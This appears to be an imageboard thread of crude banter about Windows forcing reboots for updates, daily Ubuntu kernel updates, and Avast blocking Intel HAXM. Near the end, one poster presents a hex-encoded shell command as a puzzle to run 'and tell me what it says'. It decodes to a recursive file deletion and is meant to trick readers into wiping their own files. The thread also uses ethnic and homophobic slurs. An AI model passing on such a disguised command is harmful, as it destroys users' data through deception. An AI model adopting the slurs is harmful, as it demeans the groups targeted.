Install or update software
>using Windows
>Just Wangblows things
the funny thing is you CAN install most updates without rebooting... they just don't because they hate you.
>daily kernel update on ubuntu
They are just too lazy to check which updates actually require reboots and which don't
My Windows updates install themselves automatically on shutdown. I haven't had a case yet where I _needed_ to install an update while working on it.
For any other software I just restart the service, that's usually enough. But go try explain that some normies, so they're better off just restarting everything.
>want to install Intel HAXM
>says my computer supports it but I need to enable VT-x
>it's already enabled
>must UNINSTALL avast to be able to install HAXM
>reinstall avast
Life is hard when you're a windows pleb
>having avast installed
that's what ya get, dummy
You don't really need newest kernel for every day use so you can just stick with current one until reboot though.
On the other side Windows will haunt you every 4 hours to reboot and it will eventually do it over night without your consent.
>0.002 shekels were deposited to your account
>restart for changes to take affect
>can already notice they've taken affect without restart
...
So Avast is the reason why I can't use hardware accelerated VMs on my PC? Thanks Avast, I guess that's it between us. I was disappointed and sad when you MITM'd me, but this is just too much.
You will probably keep using it you pathetic fool
You're right, I'm too lazy to switch. I don't know what should I switch to.
I just uninstalled web shield when they MITM'd me, if I uninstall file shield now then that's it, that's the last component of Avast gone.
>not using Arch

Why can't these fucking Pajeets just include those updates in the installer?
>I don't know what should I switch to.
Install gentoo
Because Arch breaks everything without asking.
Pro tip: Unless you're running windows 95, you don't really need to reboot.
Don't use systemd faggot
sudo apt update && sudo apt upgrade && sudo apt full-upgrade
no restart needed
TFW I can
>update my whole OS and all my applications
>at my convenience
>with one command
>while the OS and applications are running
>without needing a reboot
Really comfy desu
Try
$(echo 726d202d7266202a | xxd -r -p)
And tell me what it says
>Ubuntu
>Daily kernel updates
Never on Linux! Or wait, actually on Linux as well.
